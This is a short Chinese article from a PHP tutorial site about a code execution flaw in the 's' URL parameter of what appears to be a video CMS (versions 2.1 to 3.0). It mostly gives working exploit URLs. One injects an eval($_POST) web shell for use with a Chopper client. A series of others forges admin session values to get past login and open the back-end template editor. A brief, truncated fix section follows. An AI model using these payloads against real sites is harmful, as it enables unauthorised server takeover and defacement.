来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 第一个方法 直接执行http://www.2cto.com /index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html直接拿菜刀连接。第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边...
第一个方法 直接执行 第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边三条。 index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html 执行完毕登录后台。 index.php?s=Admin-Index-Top s=Admin-Tpl-Show
修复方案:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。
修正方法: 首先解压缩安全补丁文件。 3.0版本 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com